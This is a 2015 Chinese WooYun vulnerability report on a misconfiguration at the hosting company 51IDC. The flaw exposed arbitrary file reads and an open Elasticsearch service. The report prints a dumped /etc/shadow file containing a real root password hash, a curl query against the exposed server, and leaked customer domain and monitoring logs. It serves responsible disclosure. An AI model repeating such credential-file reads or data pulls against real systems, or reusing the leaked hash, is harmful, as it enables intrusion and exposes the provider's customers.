漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0112618
漏洞标题:51IDC某处配置不当一枚造成任意文件读取
相关厂商:51IDC(安畅网络)
漏洞作者: izy
提交时间:2015-05-07 14:46
修复时间:2015-06-25 10:38
公开时间:2015-06-25 10:38
漏洞类型:重要敏感信息泄露
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开
简要描述:
任意文件读取
详细说明:
ip来源:http://wooyun.org/bugs/wooyun-2010-0108219
直接读了shadow文件
root:$6$7gdIDbHJ$M3ozjM1jcGyxjwS7mKakC79OHIys7TchDKZ0KYOwYqruDBQsp2D3og/pam8rQecwxNGIUy8vZsCUtpspLLi3L1:16506:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:16506::::::
vcsa:!!:16506::::::
abrt:!!:16506::::::
haldaemon:!!:16506::::::
ntp:!!:16506::::::
saslauth:!!:16506::::::
postfix:!!:16506::::::
sshd:!!:16506::::::
tcpdump:!!:16506::::::
apache:!!:16506::::::
mysql:!!:16506::::::
izy@Macintosh:~$ curl http://58.215.139.37:9200/_search?pretty
{
"took" : 17,
"timed_out" : false,
"_shards" : {
"total" : 62,
"successful" : 62,
"failed" : 0
},
"hits" : {
"total" : 12634697,
"max_score" : 1.0,
"hits" : [ {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "TNBplZdJTku7WjZkIfjyAg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.809Z","host":"127.0.0.1:49082","type":"datalog","status":1,"node_label":"网内节点","domain":"financecity.org","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":65,"data":"58.215.186.121","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":65,"dlabel":"金程国际financecity.org","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":65,"time_total":9.943}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "AOkUKSZ1TPmdh77v4RAGiw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.819Z","host":"127.0.0.1:49087","type":"datalog","status":1,"node_label":"网内节点","domain":"gfedu.net","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":66,"data":"58.215.186.122","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":66,"dlabel":"金程国际gfedu.net","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":66,"time_total":11.96}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "7GE713ACSTi9Xgtv6pY3Nw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.844Z","host":"127.0.0.1:49090","type":"datalog","status":1,"node_label":"网内节点","domain":"gpst.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":37,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":4.935,"ping_id":37,"dlabel":"上海华东人才gpst.cn","glabel":"上海华东人才","group_id":30,"domain_id":37,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "KoEfvHN7QyWqXh8l9RFhpw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.862Z","host":"127.0.0.1:49091","type":"datalog","status":1,"node_label":"网内节点","domain":"www.lillyoncology.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":32,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.177,"ping_id":32,"dlabel":"礼来国际www.lillyoncology.com.cn","glabel":"礼来国际","group_id":23,"domain_id":32,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "fXEd4gQWQP2ymF8fMg7LFg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49092","type":"datalog","status":1,"node_label":"网内节点","domain":"www.sunflowerclub.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":33,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.87,"ping_id":33,"dlabel":"礼来国际www.sunflowerclub.com.cn","glabel":"礼来国际","group_id":23,"domain_id":33,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "pI668m_vS6CvonzA18AFBg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49094","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":38,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.537,"ping_id":38,"dlabel":"上海华东人才www.huadong.cn","glabel":"上海华东人才","group_id":30,"domain_id":38,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "-GgISu37T5qn6G7bnEe4CA",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49096","type":"datalog","status":1,"node_label":"网内节点","domain":"www.niwodai.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":4,"data":"61.160.209.154","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":4,"dlabel":"上海嘉银www.niwodai.com","glabel":"默认","group_id":1,"qtype":"A","domain_id":4,"time_total":13.463}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "_2OC78h4R5ONSZPZcwJ6aQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49095","type":"datalog","status":1,"node_label":"网内节点","domain":"www.louisfenysh.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":77,"data":"114.80.110.203","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":77,"dlabel":"上海欧晴www.louisfenysh.com","glabel":"上海欧睛","group_id":60,"qtype":"A","domain_id":77,"time_total":10.156}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "L4yFkCY9QNG6hr-q-za1nQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49097","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.net.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":39,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":8.239,"ping_id":39,"dlabel":"上海华东人才www.huadong.net.cn","glabel":"上海华东人才","group_id":30,"domain_id":39,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "bnYfZxh1Sv6XaRR9o7kvsw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.872Z","host":"127.0.0.1:49109","type":"datalog","status":1,"node_label":"网内节点","domain":"0019.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":98,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.146,"ping_id":98,"dlabel":"相亲相爱02","glabel":"济南相亲相爱","group_id":16,"domain_id":110,"errmsg":""}
} ]
}
}
漏洞证明:
修复方案:
打补丁..
版权声明:转载请注明来源 izy@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-05-11 10:37
厂商回复:
感谢关注!已处理。
最新状态:
暂无